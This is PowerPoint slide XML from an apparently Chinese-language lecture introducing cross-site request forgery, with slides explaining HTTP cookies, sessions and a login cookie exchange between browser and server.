              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC74485-F88D-4FCA-B716-73CC737CE9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8123596" y="3439321"/>
            <a:ext cx="258404" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>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325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3251">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3251">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3251">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325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04" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2057400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(CSRF/XSRF,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cross Site Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</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CE32B-B843-46C2-955F-20191EDDB598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookies + Sessions</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13219647-487E-4260-91C0-E3346C8252E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="8153400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>是无状态的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>如何支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP Cookies: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务端发送给浏览器的一小片数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器保存该数据，并在将来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中，向服务器发送该数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Session Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Logins,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>shopping carts,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Personalization: User preferences, themes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>其它设置信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：记录和分析用户行为</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165231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en-US" sz="4000" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2154729"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="2154729"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6495246" y="1676400"/>
            <a:ext cx="954107" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1542246" y="1676400"/>
            <a:ext cx="954107" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>浏览器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89095" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2307129"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89096" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="345248">
            <a:off x="3492500" y="2078529"/>
            <a:ext cx="2146300" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>POST/login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89097" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4812204"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89098" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2743200" y="3450129"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89099" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2743200" y="5659929"/>
            <a:ext cx="4267200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89100" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="2727325" y="3145329"/>
            <a:ext cx="3565525" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Set-cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89101" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="404233">
            <a:off x="3244850" y="4477242"/>
            <a:ext cx="2613025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89102" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="3932238" y="5459904"/>
            <a:ext cx="1195387" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>response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7269CF-6F1B-46CF-841F-5AC94332A360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置和发送</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20C90B13-8EE1-4C23-8113-84B483216E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799" y="1534758"/>
            <a:ext cx="5334000" cy="2112083"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{286C6B10-0F04-4CDC-8BCA-9635B33D1E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847" y="4038600"/>
            <a:ext cx="5943905" cy="2108308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3656135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6DD570-30A6-4671-A940-7390E6E9B5B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Login Session</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F157D0-34B1-4633-B980-44419010EF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799" y="1952548"/>
            <a:ext cx="8093659" cy="3533851"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE31148-A1DF-4DCF-B106-5C86964C85FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="3624590"/>
            <a:ext cx="762000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B408A988-D327-4FDE-9ED6-9823805B8FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
